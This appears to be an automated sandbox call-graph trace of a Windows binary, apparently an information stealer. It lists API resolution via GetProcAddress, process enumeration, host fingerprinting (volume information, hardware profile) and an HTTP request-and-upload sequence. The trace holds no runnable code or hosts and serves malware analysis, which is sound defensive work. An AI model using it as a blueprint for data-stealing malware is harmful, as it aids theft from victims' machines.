92248->92249 92250 4020fd 80 API calls 92249->92250 92251 402a6d 92250->92251 92252 4020fd 80 API calls 92251->92252 92253 402a83 92252->92253 92254 4020fd 80 API calls 92253->92254 92255 402a9c 92254->92255 92256 4020fd 80 API calls 92255->92256 92257 402ab1 92256->92257 92258 4020fd 80 API calls 92257->92258 92259 402ac6 92258->92259 92260 4020fd 80 API calls 92259->92260 92261 402adc 92260->92261 92262 4020fd 80 API calls 92261->92262 92263 402af1 92262->92263 92264 4020fd 80 API calls 92263->92264 92265 402b06 92264->92265 92266 4020fd 80 API calls 92265->92266 92267 402b1e 92266->92267 92268 4020fd 80 API calls 92267->92268 92269 402b33 92268->92269 92270 4020fd 80 API calls 92269->92270 92271 402b49 92270->92271 92272 4020fd 80 API calls 92271->92272 92273 402b5f 92272->92273 92274 4020fd 80 API calls 92273->92274 92275 402b75 92274->92275 92276 4020fd 80 API calls 92275->92276 92277 402b8b 92276->92277 92278 4020fd 80 API calls 92277->92278 92279 402ba4 92278->92279 92280 4020fd 80 API calls 92279->92280 92281 402bba 92280->92281 92282 4020fd 80 API calls 92281->92282 92283 402bd0 92282->92283 92284 4020fd 80 API calls 92283->92284 92285 402be6 92284->92285 92286 4020fd 80 API calls 92285->92286 92287 402bfc 92286->92287 92288 4020fd 80 API calls 92287->92288 92289 402c12 92288->92289 92290 4020fd 80 API calls 92289->92290 92291 402c2b 92290->92291 92292 4020fd 80 API calls 92291->92292 92293 402c41 92292->92293 92294 4020fd 80 API calls 92293->92294 92295 402c57 92294->92295 92296 4020fd 80 API calls 92295->92296 92297 402c6c 92296->92297 92298 4020fd 80 API calls 92297->92298 92299 402c82 92298->92299 92300 4020fd 80 API calls 92299->92300 92301 402c98 92300->92301 92302 4020fd 80 API calls 92301->92302 92303 402cb1 92302->92303 92304 4020fd 80 API calls 92303->92304 92305 402cc7 92304->92305 92306 4020fd 80 API calls 92305->92306 92307 402cdd 92306->92307 92308 4020fd 80 API calls 92307->92308 92309 402cf3 92308->92309 92310 4020fd 80 API calls 92309->92310 92311 402d09 92310->92311 92312 4020fd 80 API calls 92311->92312 92313 402d1f 92312->92313 92314 4020fd 80 API calls 92313->92314 92315 402d38 92314->92315 92316 4020fd 80 API calls 92315->92316 92317 402d4e 92316->92317 92318 4020fd 80 API calls 92317->92318 92319 402d64 92318->92319 92320 4020fd 80 API calls 92319->92320 92321 402d7a 92320->92321 92322 4020fd 80 API calls 92321->92322 92323 402d90 92322->92323 92324 4020fd 80 API calls 92323->92324 92325 402da6 92324->92325 92326 4020fd 80 API calls 92325->92326 92327 402dbe 92326->92327 92328 4020fd 80 API calls 92327->92328 92329 402dd3 92328->92329 92330 4020fd 80 API calls 92329->92330 92331 402de9 92330->92331 92332 4020fd 80 API calls 92331->92332 92333 402dff 92332->92333 92334 4020fd 80 API calls 92333->92334 92335 402e15 92334->92335 92336 4020fd 80 API calls 92335->92336 92337 402e2a 92336->92337 92338 4020fd 80 API calls 92337->92338 92339 402e43 92338->92339 92340 4020fd 80 API calls 92339->92340 92341 402e59 92340->92341 92342 4020fd 80 API calls 92341->92342 92343 402e6f 92342->92343 92344 4020fd 80 API calls 92343->92344 92345 402e84 92344->92345 92346 4020fd 80 API calls 92345->92346 92347 402e9a 92346->92347 92348 4020fd 80 API calls 92347->92348 92349 402eb0 92348->92349 92350 4020fd 80 API calls 92349->92350 92351 402ec9 92350->92351 92352 4020fd 80 API calls 92351->92352 92353 402edf 92352->92353 92354 4020fd 80 API calls 92353->92354 92355 402ef5 92354->92355 92356 4020fd 80 API calls 92355->92356 92357 402f0b 92356->92357 92358 4020fd 80 API calls 92357->92358 92359 402f21 92358->92359 92360 4020fd 80 API calls 92359->92360 92361 402f37 92360->92361 92362 4020fd 80 API calls 92361->92362 92363 402f50 92362->92363 92364 4020fd 80 API calls 92363->92364 92365 402f66 92364->92365 92366 4020fd 80 API calls 92365->92366 92367 402f7c 92366->92367 92368 4020fd 80 API calls 92367->92368 92369 402f92 92368->92369 92370 4020fd 80 API calls 92369->92370 92371 402fa8 92370->92371 92372 4020fd 80 API calls 92371->92372 92373 402fbd 92372->92373 92374 4020fd 80 API calls 92373->92374 92375 402fd6 92374->92375 92376 4020fd 80 API calls 92375->92376 92377 402feb 92376->92377 92378 4020fd 80 API calls 92377->92378 92379 403001 92378->92379 92380 4020fd 80 API calls 92379->92380 92381 403017 92380->92381 92382 4020fd 80 API calls 92381->92382 92383 40302d 92382->92383 92384 4020fd 80 API calls 92383->92384 92385 403043 92384->92385 92386 4020fd 80 API calls 92385->92386 92387 40305b 92386->92387 92388 4020fd 80 API calls 92387->92388 92389 403071 92388->92389 92390 4020fd 80 API calls 92389->92390 92391 403087 92390->92391 92392 4020fd 80 API calls 92391->92392 92393 40309d 92392->92393 92394 4020fd 80 API calls 92393->92394 92395 4030b3 92394->92395 92396 4020fd 80 API calls 92395->92396 92397 4030c9 92396->92397 92398 4020fd 80 API calls 92397->92398 92399 4030e2 92398->92399 92400 4020fd 80 API calls 92399->92400 92401 4030f8 92400->92401 92402 4020fd 80 API calls 92401->92402 92403 40310e 92402->92403 92404 4020fd 80 API calls 92403->92404 92405 403124 92404->92405 92406 4020fd 80 API calls 92405->92406 92407 40313a 92406->92407 92408 4020fd 80 API calls 92407->92408 92409 403150 92408->92409 92410 4020fd 80 API calls 92409->92410 92411 403169 92410->92411 92412 4020fd 80 API calls 92411->92412 92413 40317e 92412->92413 92414 4020fd 80 API calls 92413->92414 92415 403194 92414->92415 92416 4020fd 80 API calls 92415->92416 92417 4031aa 92416->92417 92418 4020fd 80 API calls 92417->92418 92419 4031c0 92418->92419 92420 4020fd 80 API calls 92419->92420 92421 4031d6 92420->92421 92422 4020fd 80 API calls 92421->92422 92423 4031ef 92422->92423 92424 4020fd 80 API calls 92423->92424 92425 403205 92424->92425 92426 4020fd 80 API calls 92425->92426 92427 40321b 92426->92427 92428 4020fd 80 API calls 92427->92428 92429 403231 92428->92429 92430 4020fd 80 API calls 92429->92430 92431 403246 92430->92431 92432 4020fd 80 API calls 92431->92432 92433 40325c 92432->92433 92434 4020fd 80 API calls 92433->92434 92435 403275 92434->92435 92436 4020fd 80 API calls 92435->92436 92437 40328b 92436->92437 92438 4020fd 80 API calls 92437->92438 92439 4032a1 92438->92439 92440 4020fd 80 API calls 92439->92440 92441 4032b7 92440->92441 92442 4020fd 80 API calls 92441->92442 92443 4032cd 92442->92443 92444 4020fd 80 API calls 92443->92444 92445 4032e3 92444->92445 92446 4020fd 80 API calls 92445->92446 92447 4032fc 92446->92447 92448 4020fd 80 API calls 92447->92448 92449 403312 92448->92449 92450 4020fd 80 API calls 92449->92450 92451 403328 92450->92451 92452 4020fd 80 API calls 92451->92452 92453 40333e 92452->92453 92454 4020fd 80 API calls 92453->92454 92455 403353 92454->92455 92456 4020fd 80 API calls 92455->92456 92457 403369 92456->92457 92458 4020fd 80 API calls 92457->92458 92459 403382 92458->92459 92460 4020fd 80 API calls 92459->92460 92461 403398 92460->92461 92462 4020fd 80 API calls 92461->92462 92463 4033ae 92462->92463 92464 4020fd 80 API calls 92463->92464 92465 4033c4 92464->92465 92466 4020fd 80 API calls 92465->92466 92467 4033da 92466->92467 92468 4020fd 80 API calls 92467->92468 92469 4033f0 92468->92469 92470 4020fd 80 API calls 92469->92470 92471 403409 92470->92471 92472 4020fd 80 API calls 92471->92472 92473 40341f 92472->92473 92474 4020fd 80 API calls 92473->92474 92475 403435 92474->92475 92476 4020fd 80 API calls 92475->92476 92477 40344b 92476->92477 92478 4020fd 80 API calls 92477->92478 92479 403460 92478->92479 92480 4020fd 80 API calls 92479->92480 92481 403476 92480->92481 92482 4020fd 80 API calls 92481->92482 92483 40348e 92482->92483 92484 4020fd 80 API calls 92483->92484 92485 4034a4 92484->92485 92486 4020fd 80 API calls 92485->92486 92487 4034ba 92486->92487 92488 4020fd 80 API calls 92487->92488 92489 4034d0 92488->92489 92490 4020fd 80 API calls 92489->92490 92491 4034e6 92490->92491 92492 4020fd 80 API calls 92491->92492 92493 4034fc 92492->92493 92494 4020fd 80 API calls 92493->92494 92495 403515 92494->92495 92496 4020fd 80 API calls 92495->92496 92497 40352b 92496->92497 92498 4020fd 80 API calls 92497->92498 92499 403541 92498->92499 92500 4020fd 80 API calls 92499->92500 92501 403557 92500->92501 92502 4020fd 80 API calls 92501->92502 92503 40356d 92502->92503 92504 4020fd 80 API calls 92503->92504 92505 403583 92504->92505 92506 4020fd 80 API calls 92505->92506 92507 40359c 92506->92507 92508 4020fd 80 API calls 92507->92508 92509 4035b2 92508->92509 92510 4020fd 80 API calls 92509->92510 92511 4035c8 92510->92511 92512 4020fd 80 API calls 92511->92512 92513 4035dd 92512->92513 92514 4020fd 80 API calls 92513->92514 92515 4035f3 92514->92515 92516 4020fd 80 API calls 92515->92516 92517 403609 92516->92517 92518 4020fd 80 API calls 92517->92518 92519 403622 92518->92519 92520 4020fd 80 API calls 92519->92520 92521 403638 92520->92521 92522 4020fd 80 API calls 92521->92522 92523 40364e 92522->92523 92524 4020fd 80 API calls 92523->92524 92525 403663 92524->92525 92526 4020fd 80 API calls 92525->92526 92527 403679 92526->92527 92528 4020fd 80 API calls 92527->92528 92529 40368f 92528->92529 92530 4020fd 80 API calls 92529->92530 92531 4036a8 92530->92531 92532 4020fd 80 API calls 92531->92532 92533 4036be 92532->92533 92534 4020fd 80 API calls 92533->92534 92535 4036d4 92534->92535 92536 4020fd 80 API calls 92535->92536 92537 4036ea 92536->92537 92538 4020fd 80 API calls 92537->92538 92539 403700 92538->92539 92540 4020fd 80 API calls 92539->92540 92541 403715 92540->92541 92542 4020fd 80 API calls 92541->92542 92543 40372e 92542->92543 92544 4020fd 80 API calls 92543->92544 92545 403744 92544->92545 92546 4020fd 80 API calls 92545->92546 92547 40375a 92546->92547 92548 4020fd 80 API calls 92547->92548 92549 403770 92548->92549 92550 4020fd 80 API calls 92549->92550 92551 403786 92550->92551 92552 4020fd 80 API calls 92551->92552 92553 40379c 92552->92553 92554 4020fd 80 API calls 92553->92554 92555 4037b4 92554->92555 92556 4020fd 80 API calls 92555->92556 92557 4037ca 92556->92557 92558 4020fd 80 API calls 92557->92558 92559 4037df 92558->92559 92560 4020fd 80 API calls 92559->92560 92561 4037f4 92560->92561 92562 4020fd 80 API calls 92561->92562 92563 40380a 92562->92563 92564 4020fd 80 API calls 92563->92564 92565 40381f 92564->92565 92566 4020fd 80 API calls 92565->92566 92567 403838 92566->92567 92568 4020fd 80 API calls 92567->92568 92569 40384e 92568->92569 92570 4020fd 80 API calls 92569->92570 92571 403864 92570->92571 92572 4020fd 80 API calls 92571->92572 92573 40387a 92572->92573 92574 4020fd 80 API calls 92573->92574 92575 403890 92574->92575 92576 4020fd 80 API calls 92575->92576 92577 4038a6 92576->92577 92578 4020fd 80 API calls 92577->92578 92579 4038be 92578->92579 92580 4020fd 80 API calls 92579->92580 92581 4038d3 92580->92581 92582 4020fd 80 API calls 92581->92582 92583 4038e8 92582->92583 92584 4020fd 80 API calls 92583->92584 92585 4038fe 92584->92585 92586 4020fd 80 API calls 92585->92586 92587 403914 92586->92587 92588 4020fd 80 API calls 92587->92588 92589 403929 92588->92589 92590 4020fd 80 API calls 92589->92590 92591 403942 92590->92591 92592 4020fd 80 API calls 92591->92592 92593 403958 92592->92593 92594 4020fd 80 API calls 92593->92594 92595 40396d 92594->92595 92596 4020fd 80 API calls 92595->92596 92597 403983 92596->92597 92598 4020fd 80 API calls 92597->92598 92599 403999 92598->92599 92600 4020fd 80 API calls 92599->92600 92601 4039ae 92600->92601 92602 4020fd 80 API calls 92601->92602 92603 4039c7 92602->92603 92604 4020fd 80 API calls 92603->92604 92605 4039dd 92604->92605 92606 4020fd 80 API calls 92605->92606 92607 4039f3 92606->92607 92608 4020fd 80 API calls 92607->92608 92609 403a08 92608->92609 92610 4020fd 80 API calls 92609->92610 92611 403a1e 92610->92611 92612 4020fd 80 API calls 92611->92612 92613 403a34 92612->92613 92614 4020fd 80 API calls 92613->92614 92615 403a4d 92614->92615 92616 4020fd 80 API calls 92615->92616 92617 403a63 92616->92617 92618 4020fd 80 API calls 92617->92618 92619 403a79 92618->92619 92620 4020fd 80 API calls 92619->92620 92621 403a8e 92620->92621 92622 4020fd 80 API calls 92621->92622 92623 403aa4 92622->92623 92624 4020fd 80 API calls 92623->92624 92625 403aba 92624->92625 92626 4020fd 80 API calls 92625->92626 92627 403ad3 92626->92627 92628 4020fd 80 API calls 92627->92628 92629 403ae8 92628->92629 92630 4020fd 80 API calls 92629->92630 92631 403afe 92630->92631 92632 4020fd 80 API calls 92631->92632 92633 403b14 92632->92633 92634 4020fd 80 API calls 92633->92634 92635 403b2a 92634->92635 92636 4020fd 80 API calls 92635->92636 92637 403b40 92636->92637 92638 4020fd 80 API calls 92637->92638 92639 403b59 92638->92639 92640 4020fd 80 API calls 92639->92640 92641 403b6f 92640->92641 92642 4020fd 80 API calls 92641->92642 92643 403b84 92642->92643 92644 4020fd 80 API calls 92643->92644 92645 403b99 92644->92645 92646 4020fd 80 API calls 92645->92646 92647 403bae 92646->92647 92648 4020fd 80 API calls 92647->92648 92649 403bc3 92648->92649 92650 4020fd 80 API calls 92649->92650 92651 403bdc 92650->92651 92652 4020fd 80 API calls 92651->92652 92653 403bf2 92652->92653 92654 4020fd 80 API calls 92653->92654 92655 403c07 92654->92655 92656 4020fd 80 API calls 92655->92656 92657 403c1d 92656->92657 92658 4020fd 80 API calls 92657->92658 92659 403c32 92658->92659 92660 4020fd 80 API calls 92659->92660 92661 403c48 92660->92661 92662 4020fd 80 API calls 92661->92662 92663 403c61 92662->92663 92664 4020fd 80 API calls 92663->92664 92665 403c76 92664->92665 92666 4020fd 80 API calls 92665->92666 92667 403c8b 92666->92667 92668 4020fd 80 API calls 92667->92668 92669 403ca1 92668->92669 92670 4020fd 80 API calls 92669->92670 92671 403cb7 92670->92671 92672 4020fd 80 API calls 92671->92672 92673 403ccd 92672->92673 92674 4020fd 80 API calls 92673->92674 92675 403ce6 92674->92675 92676 4020fd 80 API calls 92675->92676 92677 403cfc 92676->92677 92678 4020fd 80 API calls 92677->92678 92679 403d12 92678->92679 92680 4020fd 80 API calls 92679->92680 92681 403d28 92680->92681 92682 4020fd 80 API calls 92681->92682 92683 403d3d 92682->92683 92684 4020fd 80 API calls 92683->92684 92685 403d52 92684->92685 92686 4020fd 80 API calls 92685->92686 92687 403d6d 92686->92687 92688 4020fd 80 API calls 92687->92688 92689 403d82 92688->92689 92690 4020fd 80 API calls 92689->92690 92691 403d98 92690->92691 92692 4020fd 80 API calls 92691->92692 92693 403dae 92692->92693 92694 4020fd 80 API calls 92693->92694 92695 403dc4 92694->92695 92696 4020fd 80 API calls 92695->92696 92697 403dda 92696->92697 92698 4020fd 80 API calls 92697->92698 92699 403df3 92698->92699 92700 4020fd 80 API calls 92699->92700 92701 403e09 92700->92701 92702 4020fd 80 API calls 92701->92702 92703 403e1e 92702->92703 92704 4020fd 80 API calls 92703->92704 92705 403e33 92704->92705 92706 4020fd 80 API calls 92705->92706 92707 403e49 92706->92707 92708 4020fd 80 API calls 92707->92708 92709 403e5e 92708->92709 92710 4020fd 80 API calls 92709->92710 92711 403e77 92710->92711 92712 4020fd 80 API calls 92711->92712 92713 403e8d 92712->92713 92714 4020fd 80 API calls 92713->92714 92715 403ea2 92714->92715 92716 4020fd 80 API calls 92715->92716 92717 403eb7 92716->92717 92718 4020fd 80 API calls 92717->92718 92719 403ecd 92718->92719 92720 4020fd 80 API calls 92719->92720 92721 403ee3 92720->92721 92722 4020fd 80 API calls 92721->92722 92723 403efc 92722->92723 92724 41616a 92723->92724 92725 416177 50 API calls 92724->92725 92726 4165e9 9 API calls 92724->92726 92725->92726 92727 4166f8 92726->92727 92728 41668a GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 92726->92728 92729 416705 8 API calls 92727->92729 92730 4167b8 92727->92730 92728->92727 92729->92730 92731 4167c1 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 92730->92731 92732 41682f 92730->92732 92731->92732 92733 4168c1 92732->92733 92734 41683c 6 API calls 92732->92734 92735 416998 92733->92735 92736 4168ce 9 API calls 92733->92736 92734->92733 92737 4169a1 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 92735->92737 92738 416a0f 92735->92738 92736->92735 92737->92738 92739 416a41 92738->92739 92740 416a18 GetProcAddress GetProcAddress 92738->92740 92741 416a73 92739->92741 92742 416a4a GetProcAddress GetProcAddress 92739->92742 92740->92739 92743 416a80 10 API calls 92741->92743 92744 416b5f 92741->92744 92742->92741 92743->92744 92745 416b68 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 92744->92745 92746 416bbf 92744->92746 92745->92746 92747 416bc8 GetProcAddress 92746->92747 92748 416bda 92746->92748 92747->92748 92749 416be3 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 92748->92749 92750 416c3a 92748->92750 92749->92750 92751 416c43 GetProcAddress 92750->92751 92752 416c54 92750->92752 92751->92752 92752->91789 92754 40fe76 CloseHandle 92753->92754 92755 40fe4a Process32Next 92753->92755 92754->91972 92755->92754 92756 40fe5c StrCmpCA 92755->92756 92756->92755 92757 40fe70 92756->92757 92757->92755 94111 4192b5 92758->94111 92760 41932e 92760->91984 92762 40e58f lstrcpyA 92761->92762 92763 40f6da 92762->92763 92764 40e58f lstrcpyA 92763->92764 92765 40f6e8 GetSystemTime 92764->92765 92766 40f705 92765->92766 92766->91793 92769 40e6b9 92767->92769 92768 40e6dd 92768->91810 92769->92768 92770 40e6cb lstrcpyA lstrcatA 92769->92770 92770->92768 92772 40e5c6 lstrcpyA 92771->92772 92773 401334 92772->92773 92774 40e5c6 lstrcpyA 92773->92774 92775 401340 92774->92775 92776 40e5c6 lstrcpyA 92775->92776 92777 40134c 92776->92777 92778 40e5c6 lstrcpyA 92777->92778 92779 401364 92778->92779 92780 41217a 92779->92780 92781 41218d 92780->92781 92782 40e603 2 API calls 92781->92782 92783 41219b 92782->92783 92784 40e603 2 API calls 92783->92784 92785 4121a4 92784->92785 92786 40e603 2 API calls 92785->92786 92787 4121ad 92786->92787 92788 40e58f lstrcpyA 92787->92788 92789 4121ba 92788->92789 92790 40e58f lstrcpyA 92789->92790 92791 4121c3 92790->92791 92792 40e58f lstrcpyA 92791->92792 92793 4121cc 92792->92793 92794 40e58f lstrcpyA 92793->92794 92795 4121d5 92794->92795 92796 40e58f lstrcpyA 92795->92796 92797 4121de 92796->92797 92798 40e58f lstrcpyA 92797->92798 92814 4121e7 92798->92814 92799 402039 lstrcpyA 92799->92814 92801 4020b7 lstrcpyA 92801->92814 92802 4122b4 StrCmpCA 92802->92814 92803 412312 StrCmpCA 92804 4128d5 92803->92804 92803->92814 92805 40e64d lstrcpyA 92804->92805 92806 4128e1 92805->92806 92807 4020b7 lstrcpyA 92806->92807 92808 4128ea 92807->92808 92809 40e64d lstrcpyA 92808->92809 92812 4128f4 92809->92812 92810 41244a StrCmpCA 92811 4128a3 92810->92811 92810->92814 92813 40e64d lstrcpyA 92811->92813 94146 4020d3 lstrcpyA 92812->94146 92815 4128af 92813->92815 92814->92799 92814->92801 92814->92802 92814->92803 92814->92810 92819 412582 StrCmpCA 92814->92819 92823 4020a2 lstrcpyA 92814->92823 92824 41177b 28 API calls 92814->92824 92829 402063 lstrcpyA 92814->92829 92830 402078 lstrcpyA 92814->92830 92836 4126ba StrCmpCA 92814->92836 92840 40208d lstrcpyA 92814->92840 92843 4123ec StrCmpCA 92814->92843 92847 4127ec StrCmpCA 92814->92847 92848 401324 lstrcpyA 92814->92848 92853 4116e3 23 API calls 92814->92853 92856 412524 StrCmpCA 92814->92856 92863 41265c StrCmpCA 92814->92863 92865 412794 StrCmpCA 92814->92865 92866 40e5c6 lstrcpyA 92814->92866 92867 40e64d lstrcpyA 92814->92867 94136 40204e lstrcpyA 92814->94136 94144 40208d lstrcpyA 92815->94144 92818 4128b8 92820 40e64d lstrcpyA 92818->92820 92819->92814 92822 412871 92819->92822 92826 4128c2 92820->92826 92821 40e64d lstrcpyA 92827 41290f 92821->92827 92825 40e64d lstrcpyA 92822->92825 92823->92814 92824->92814 92828 41287d 92825->92828 94145 4020e8 lstrcpyA 92826->94145 94129 4118a1 92827->94129 94142 40208d lstrcpyA 92828->94142 92829->92814 92830->92814 92834 412886 92837 40e64d lstrcpyA 92834->92837 92835 412837 92835->92821 92836->92814 92838 41283c 92836->92838 92839 412890 92837->92839 92841 40e64d lstrcpyA 92838->92841 94143 4020e8 lstrcpyA 92839->94143 92840->92814 92842 412848 92841->92842 94139 4020b7 92842->94139 92843->92814 92850 412807 92847->92850 92851 4127f7 Sleep 92847->92851 92848->92814 92849 40e64d lstrcpyA 92852 41285b 92849->92852 92854 40e64d lstrcpyA 92850->92854 92851->92814 92858 4020b7 lstrcpyA 92852->92858 92853->92814 92855 412813 92854->92855 94137 40208d lstrcpyA 92855->94137 92856->92814 92858->92835 92859 41281c 92860 40e64d lstrcpyA 92859->92860 92861 412826 92860->92861 94138 4020e8 lstrcpyA 92861->94138 92862 412923 92862->91823 92863->92814 92865->92814 92866->92814 92867->92814 92869 40e64d lstrcpyA 92868->92869 92870 411b00 92869->92870 92871 40e64d lstrcpyA 92870->92871 92872 411b0c 92871->92872 92873 40e64d lstrcpyA 92872->92873 92874 411b18 92873->92874 92874->91826 92876 40e5dd 92875->92876 92877 40e5f2 92876->92877 92878 40e5ea lstrcpyA 92876->92878 92877->91840 92878->92877 92879->91859 92881 40f0b1 92880->92881 92882 40f0b8 GetVolumeInformationA 92880->92882 92881->92882 92883 40f0e8 92882->92883 92884 40f11a GetProcessHeap HeapAlloc 92883->92884 92885 40f130 92884->92885 92886 40f13e wsprintfA lstrcatA 92884->92886 92887 40e58f lstrcpyA 92885->92887 94147 40efcc GetCurrentHwProfileA 92886->94147 92889 40f139 92887->92889 92889->91872 92890 40f16e 92891 40f177 lstrlenA 92890->92891 92892 40f18c 92891->92892 94163 40fc61 lstrcpyA malloc strncpy 92892->94163 92894 40f196 92895 40f1a0 lstrcatA 92894->92895 92896 40f1b0 92895->92896 92897 40e58f lstrcpyA 92896->92897 92898 40f1c1 92897->92898 92898->92889 92900 40e5c6 lstrcpyA 92899->92900 92901 403faa 92900->92901 94167 403f08 92901->94167 92903 403fb6 92904 40e58f lstrcpyA 92903->92904 92905 403fd4 92904->92905 92906 40e58f lstrcpyA 92905->92906 92907 403fdd 92906->92907 92908 40e58f lstrcpyA 92907->92908 92909 403fe6 92908->92909 92910 40e58f lstrcpyA 92909->92910 92911 403fef 92910->92911 92912 40e58f lstrcpyA 92911->92912 92913 403ff8 92912->92913 92914 404009 InternetOpenA StrCmpCA 92913->92914 92915 40402c 92914->92915 92916 404498 InternetCloseHandle 92915->92916 92917 40f6c3 2 API calls 92915->92917 92929 4044ac 92916->92929 92918 404043 92917->92918 92919 40e694 2 API calls 92918->92919 92920 404052 92919->92920 92921 40e64d lstrcpyA 92920->92921 92922 40405b 92921->92922 92923 40e6e6 3 API calls 92922->92923 92924 40407d 92923->92924 92925 40e64d lstrcpyA 92924->92925 92926 404086 92925->92926 92927 40e6e6 3 API calls 92926->92927 92928 4040a0 92927->92928 92930 40e64d lstrcpyA 92928->92930 92929->91877 92931 4040a9 92930->92931 92932 40e694 2 API calls 92931->92932 92933 4040c1 92932->92933 92934 40e64d lstrcpyA 92933->92934 92935 4040ca 92934->92935 92936 40e6e6 3 API calls 92935->92936 92937 4040e3 92936->92937 92938 40e64d lstrcpyA 92937->92938 92939 4040ec 92938->92939 92940 40e6e6 3 API calls 92939->92940 92941 404101 92940->92941 92942 40e64d lstrcpyA 92941->92942 92943 40410a 92942->92943 92944 40e6e6 3 API calls 92943->92944 92945 40412c 92944->92945 92946 40e694 2 API calls 92945->92946 92947 404133 92946->92947 92948 40e64d lstrcpyA 92947->92948 92949 40413c 92948->92949 92950 40414c InternetConnectA 92949->92950 92950->92916 92951 404176 HttpOpenRequestA 92950->92951 92952 4041ae 92951->92952 92953 40448f InternetCloseHandle 92951->92953 92954 4041b4 InternetSetOptionA 92952->92954 92955 4041ca 92952->92955 92953->92916 92954->92955 92956 40e6e6 3 API calls 92955->92956 92957 4041d7 92956->92957 92958 40e64d lstrcpyA 92957->92958 92959 4041e0 92958->92959 92960 40e694 2 API calls 92959->92960 92961 4041f8 92960->92961 92962 40e64d lstrcpyA 92961->92962 92963 404201 92962->92963 92964 40e6e6 3 API calls 92963->92964 92965 404216 92964->92965 92966 40e64d lstrcpyA 92965->92966 92967 40421f 92966->92967 92968 40e6e6 3 API calls 92967->92968 92969 404239 92968->92969 92970 40e64d lstrcpyA 92969->92970 92971 404242 92970->92971 92972 40e6e6 3 API calls 92971->92972 92973 40425b 92972->92973 92974 40e64d lstrcpyA 92973->92974 92975 404264 92974->92975 92976 40e6e6 3 API calls 92975->92976 92977 40427d 92976->92977 92978 40e64d lstrcpyA 92977->92978 92979 404286 92978->92979 92980 40e694 2 API calls 92979->92980 92981 40429e 92980->92981 92982 40e64d lstrcpyA 92981->92982 92983 4042a7 92982->92983 92984 40e6e6 3 API calls 92983->92984 92985 4042bc 92984->92985 92986 40e64d lstrcpyA 92985->92986 92987 4042c5 92986->92987 92988 40e6e6 3 API calls 92987->92988 92989 4042da 92988->92989 92990 40e64d lstrcpyA 92989->92990 92991 4042e3 92990->92991 92992 40e694 2 API calls 92991->92992 92993 4042fb 92992->92993 92994 40e64d lstrcpyA 92993->92994 92995 404304 92994->92995 92996 40e6e6 3 API calls 92995->92996 92997 404319 92996->92997 92998 40e64d lstrcpyA 92997->92998 92999 404322 92998->92999 93000 40e6e6 3 API calls 92999->93000 93001 40433c 93000->93001 93002 40e64d lstrcpyA 93001->93002 93003 404345 93002->93003 93004 40e6e6 3 API calls 93003->93004 93005 40435e 93004->93005 93006 40e64d lstrcpyA 93005->93006 93007 404367 93006->93007 93008 40e6e6 3 API calls 93007->93008 93009 404380 93008->93009 93010 40e64d lstrcpyA 93009->93010 93011 404389 93010->93011 93012 40e694 2 API calls 93011->93012 93013 4043a1 93012->93013 93014 40e64d lstrcpyA 93013->93014 93015 4043aa 93014->93015 93016 40e58f lstrcpyA 93015->93016 93017 4043bb 93016->93017 93018 40e694 2 API calls 93017->93018 93019 4043d3 93018->93019 93020 40e694 2 API calls 93019->93020 93021 4043da 93020->93021 93022 40e64d lstrcpyA 93021->93022 93023 4043e3 93022->93023 93024 4043fb lstrlenA 93023->93024 93025 40440b 93024->93025 93026 404414 lstrlenA 93025->93026 94175 40e778 93026->94175 93028 404424 HttpSendRequestA 93029 404469 InternetReadFile 93028->93029 93030 404480 InternetCloseHandle 93029->93030 93033 404436 93029->93033 93031 40e5fa 93030->93031 93031->92953 93032 40e6e6 3 API calls 93032->93033 93033->93029 93033->93030 93033->93032 93034 40e64d lstrcpyA 93033->93034 93034->93033 94178 40e778 93035->94178 93037 410c84 StrCmpCA 93038 410c96 93037->93038 93039 410c8f ExitProcess 93037->93039 93040 410ca6 strtok_s 93038->93040 93041 410dd4 93040->93041 93054 410cb7 93040->93054 93041->91881 93042 410db7 strtok_s 93042->93041 93042->93054 93043 410d55 StrCmpCA 93043->93042 93043->93054 93044 410cf4 StrCmpCA 93044->93042 93044->93054 93045 410d24 StrCmpCA 93045->93042 93045->93054 93046 410d44 StrCmpCA 93046->93042 93046->93054 93047 410d77 StrCmpCA 93047->93042 93048 410da7 StrCmpCA 93048->93042 93049 410d66 StrCmpCA 93049->93042 93049->93054 93050 410d89 StrCmpCA 93050->93042 93051 410cdc StrCmpCA 93051->93042 93051->93054 93052 410d0c StrCmpCA 93052->93042 93052->93054 93053 40e603 2 API calls 93053->93054 93054->93042 93054->93043 93054->93044 93054->93045 93054->93046 93054->93047 93054->93048 93054->93049 93054->93050 93054->93051 93054->93052 93054->93053 93056 40e5c6 lstrcpyA 93055->93056 93057 405b13 93056->93057 93058 403f08 5 API calls 93057->93058 93059 405b1f 93058->93059 93060 40e58f lstrcpyA 93059->93060 93061 405b3d 93060->93061 93062 40e58f lstrcpyA 93061->93062 93063 405b46 93062->93063 93064 40e58f lstrcpyA 93063->93064 93065 405b4f 93064->93065 93066 40e58f lstrcpyA 93065->93066 93067 405b58 93066->93067 93068 40e58f lstrcpyA 93067->93068 93069 405b61 93068->93069 93070 405b72 InternetOpenA StrCmpCA 93069->93070 93071 405b95 93070->93071 93072 40612e InternetCloseHandle 93071->93072 93074 40f6c3 2 API calls 93071->93074 93073 406149 93072->93073 94185 406a53 CryptStringToBinaryA 93073->94185 93075 405bac 93074->93075 93077 40e694 2 API calls 93075->93077 93078 405bbb 93077->93078 93080 40e64d lstrcpyA 93078->93080 93085 405bc4 93080->93085 93081 40e603 2 API calls 93082 40615e 93081->93082 93083 40e6e6 3 API calls 93082->93083 93084 40616c 93083->93084 93086 40e64d lstrcpyA 93084->93086 93087 40e6e6 3 API calls 93085->93087 93094 406174 93086->93094 93088 405be6 93087->93088 93089 40e64d lstrcpyA 93088->93089 93090 405bef 93089->93090 93091 40e6e6 3 API calls 93090->93091 93092 405c09 93091->93092 93093 40e64d lstrcpyA 93092->93093 93095 405c12 93093->93095 93094->91891 93096 40e694 2 API calls 93095->93096 93097 405c2a 93096->93097 93098 40e64d lstrcpyA 93097->93098 93099 405c33 93098->93099 93100 40e6e6 3 API calls 93099->93100 93101 405c4c 93100->93101 93102 40e64d lstrcpyA 93101->93102 93103 405c55 93102->93103 93104 40e6e6 3 API calls 93103->93104 93105 405c6a 93104->93105 93106 40e64d lstrcpyA 93105->93106 93107 405c73 93106->93107 93108 40e6e6 3 API calls 93107->93108 93109 405c95 93108->93109 93110 40e694 2 API calls 93109->93110 93111 405c9c 93110->93111 